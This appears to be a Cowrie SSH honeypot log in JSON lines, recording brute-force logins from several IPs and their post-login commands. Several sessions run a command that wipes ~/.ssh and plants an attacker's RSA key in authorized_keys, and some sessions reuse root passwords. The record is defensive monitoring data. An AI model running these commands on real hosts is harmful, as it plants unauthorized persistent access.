{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.466496Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.577111Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.582364Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.583248Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":45052,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e2458aaf16f","protocol":"ssh","message":"New connection: 24.108.102.132:45052 (1.2.3.4:22) [session: 0e2458aaf16f]","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.723737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.729003Z","src_ip":"24.108.102.132","session":"0e2458aaf16f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:50:10.811075Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.811755Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
{"eventid":"cowrie.login.success","username":"root","password":"3131","message":"login attempt [root/3131] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.815297Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.891641Z","src_ip":"24.108.102.132","session":"0e2458aaf16f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.925427Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.926307Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:50:11.081112Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.081825Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.082978Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":43122,"dst_ip":"1.2.3.4","dst_port":22,"session":"285f6ce246e3","protocol":"ssh","message":"New connection: 45.159.112.103:43122 (1.2.3.4:22) [session: 285f6ce246e3]","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.084678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.086448Z","src_ip":"45.159.112.103","session":"285f6ce246e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.186339Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.192558Z","src_ip":"45.159.112.103","session":"285f6ce246e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:50:11.411870Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.412569Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.516634Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.517544Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.578788Z","src_ip":"24.108.102.132","session":"0e2458aaf16f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56590,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec3b22756fed","protocol":"ssh","message":"New connection: 212.227.235.229:56590 (1.2.3.4:22) [session: ec3b22756fed]","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.620018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.620755Z","src_ip":"212.227.235.229","session":"ec3b22756fed"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.625994Z","src_ip":"45.159.112.103","session":"285f6ce246e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:11.723742Z","src_ip":"212.227.235.229","session":"ec3b22756fed"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:50:12.179479Z","src_ip":"212.227.235.229","session":"ec3b22756fed"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:12.733686Z","src_ip":"45.159.112.103","session":"285f6ce246e3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:12.745074Z","src_ip":"24.108.102.132","session":"0e2458aaf16f"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":43126,"dst_ip":"1.2.3.4","dst_port":22,"session":"892eb6dfc9e7","protocol":"ssh","message":"New connection: 45.159.112.103:43126 (1.2.3.4:22) [session: 892eb6dfc9e7]","sensor":"my-vps","timestamp":"2025-08-26T00:50:12.851640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:12.852664Z","src_ip":"45.159.112.103","session":"892eb6dfc9e7"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":45064,"dst_ip":"1.2.3.4","dst_port":22,"session":"7394e656db19","protocol":"ssh","message":"New connection: 24.108.102.132:45064 (1.2.3.4:22) [session: 7394e656db19]","sensor":"my-vps","timestamp":"2025-08-26T00:50:12.912446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:12.917806Z","src_ip":"24.108.102.132","session":"7394e656db19"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:12.964476Z","src_ip":"45.159.112.103","session":"892eb6dfc9e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.091036Z","src_ip":"24.108.102.132","session":"7394e656db19"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.284657Z","src_ip":"212.227.235.229","session":"ec3b22756fed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56600,"dst_ip":"1.2.3.4","dst_port":22,"session":"d94ae8c64e6d","protocol":"ssh","message":"New connection: 212.227.235.229:56600 (1.2.3.4:22) [session: d94ae8c64e6d]","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.382097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.383148Z","src_ip":"212.227.235.229","session":"d94ae8c64e6d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.454004Z","src_ip":"45.159.112.103","session":"892eb6dfc9e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.482837Z","src_ip":"212.227.235.229","session":"d94ae8c64e6d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.567097Z","src_ip":"45.159.112.103","session":"892eb6dfc9e7"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.567762Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.784030Z","src_ip":"24.108.102.132","session":"7394e656db19"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.922634Z","src_ip":"212.227.235.229","session":"d94ae8c64e6d"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.961022Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:13.962820Z","src_ip":"24.108.102.132","session":"7394e656db19"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:14.023249Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:14.024121Z","src_ip":"212.227.235.229","session":"d94ae8c64e6d"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:21.172591Z","src_ip":"212.227.235.229","session":"52860e2e706f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45066,"dst_ip":"1.2.3.4","dst_port":22,"session":"b46e0e392f77","protocol":"ssh","message":"New connection: 212.227.235.229:45066 (1.2.3.4:22) [session: b46e0e392f77]","sensor":"my-vps","timestamp":"2025-08-26T00:50:36.687158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:36.688198Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha